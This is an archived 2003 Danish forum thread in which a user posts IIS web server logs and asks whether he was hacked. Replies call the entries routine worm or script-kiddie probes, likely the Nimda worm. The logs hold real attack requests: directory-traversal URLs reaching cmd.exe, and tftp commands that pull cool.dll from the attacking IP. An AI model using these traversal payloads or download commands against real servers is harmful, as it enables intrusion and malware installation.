Kandu.dk - hack?


/ Forside / Teknologi / Netværk / TCP/IP / Nyhedsindlæg

Glemt dit kodeord?

Brugernavn*

Kodeord *

Husk mig

Brugerservice

Kom godt i gang

Bliv medlem

Seneste indlæg

Find en bruger

Stil et spørgsmål

Skriv et tip

Fortæl en ven

Pointsystemet

Kontakt Kandu.dk

Emnevisning

Kategorier

Alfabetisk

Karriere

Interesser

Teknologi

Reklame

Top 10 brugere

TCP/IP

#	Navn	Point
1	Per.Frede..	4668
2	BjarneD	4017
3	severino	2804
4	pallebhan..	1680
5	EXTERMINA..	1525
6	xou	1455
7	strarup	1430
8	Manse9933	1419
9	o.v.n.	1400
10	Fijala	1204

hack?
Fra : McBrain

Dato : 22-02-03 18:43

er det her en der har hacket min webserver?....min ip er xxxxxxxx?

OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600

2003-02-21 13:34:12 192.168.0.2 - 192.168.0.1 80 PROPFIND /Jonasprøve - 404
Microsoft-WebDAV-MiniRedir/5.1.2600

2003-02-21 14:33:17 80.236.81.176 - xxxxxxxxxx 80 GET /scripts/root.exe
/c+dir 404 -

2003-02-21 14:33:23 80.236.81.176 - xxxxxxxxxx 80 GET /MSADC/root.exe /c+dir
403 -

2003-02-21 14:33:27 80.236.81.176 - xxxxxxxxxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -

2003-02-21 14:33:32 80.236.81.176 - xxxxxxxxxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -

2003-02-21 14:33:39 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -

2003-02-21 14:34:31 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502 -

2003-02-21 14:35:24 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20d:\httpodbc.dll 502 -

2003-02-21 14:36:22 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20e:\httpodbc.dll 502 -

2003-02-21 14:36:23 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../httpodbc.dll - 500 -

2003-02-21 14:36:25 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -

2003-02-21 14:36:35 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502 -

2003-02-21 14:36:37 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20d:\httpodbc.dll 502 -

2003-02-21 14:36:41 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20e:\httpodbc.dll 502 -

2003-02-21 14:36:41 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -

2003-02-21 14:36:44 80.236.81.176 - xxxxxxxxxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -

2003-02-21 14:36:45 80.236.81.176 - xxxxxxxxxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 -

2003-02-21 14:36:47 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -

2003-02-21 14:36:48 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -

2003-02-21 14:36:50 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 200 -

2003-02-21 14:36:55 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502 -

2003-02-21 18:19:23 80.198.58.140 - xxxxxxxxxx 80 GET /index.htm - 304
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 18:19:23 80.198.58.140 - xxxxxxxxxx 80 GET /ocsc-title.jpg - 304
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /downloads.htm - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /downloads.jpg - 304
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /enter.jpg - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 18:21:24 80.198.58.140 - xxxxxxxxxx 80 GET
/bigk-member-profile.htm - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 18:21:24 80.198.58.140 - xxxxxxxxxx 80 GET /big-k.jpg - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 19:18:51 80.81.70.4 - xxxxxxxxxx 80 GET /scripts/root.exe /c+dir
404 -

2003-02-21 19:18:51 80.81.70.4 - xxxxxxxxxx 80 GET /MSADC/root.exe /c+dir
403 -

2003-02-21 19:18:53 80.81.70.4 - xxxxxxxxxx 80 GET /c/winnt/system32/cmd.exe
/c+dir 404 -

2003-02-21 19:18:53 80.81.70.4 - xxxxxxxxxx 80 GET /d/winnt/system32/cmd.exe
/c+dir 404 -

2003-02-21 19:18:55 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -

2003-02-21 19:19:44 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20c:\httpodbc.dll 502 -

2003-02-21 19:19:44 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20d:\httpodbc.dll 502 -

2003-02-21 19:19:45 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20e:\httpodbc.dll 502 -

2003-02-21 19:19:45 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../httpodbc.dll - 500 -

2003-02-21 19:19:46 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -

2003-02-21 19:19:46 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20c:\httpodbc.dll 502 -

2003-02-21 19:19:47 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20d:\httpodbc.dll 502 -

2003-02-21 19:19:47 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20e:\httpodbc.dll 502 -

2003-02-21 19:19:49 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -

2003-02-21 19:19:49 80.81.70.4 - xxxxxxxxxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -

2003-02-21 19:19:50 80.81.70.4 - xxxxxxxxxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 -

2003-02-21 19:19:50 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -

2003-02-21 19:19:51 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -

Steen Suder, privat (23-02-2003)

Kommentar
Fra : Steen Suder, privat

Dato : 23-02-03 00:19

McBrain wrote:
> er det her en der har hacket min webserver?....min ip er xxxxxxxx?

<KLIP log>

Nej, det tror jeg ikke. Det ligner bare de alm. angrebsforsøg fra orm og
scriptkiddies. Uden at gå i detaljer med opsætning og analyse, kan jeg
også sige at jeg ser masser af den slags på de fleste webservere.

--
Mvh. / Best regards,
Steen Suder <http://www.suder.dk/>
ICQ UIN 4133803

15kw (23-02-2003)

Kommentar
Fra : 15kw

Dato : 23-02-03 16:06

"McBrain" <jojo@yahoo.dk> skrev i
news:3e57b699$0$15854$edfadb0f@dread11.news.tele.dk
> er det her en der har hacket min webserver?....min ip er xxxxxxxx?
>
>
Det ligner NIMDA ormen.

--
Hilsen
Peter N Petersen
http://peteropfinder.dk

Søg

Reklame

Statistik

Spørgsmål :	177503
Tips :	31968
Nyheder :	719565
Indlæg :	6408545
Brugere :	218887

Månedens bedste

Årets bedste

Sidste års bedste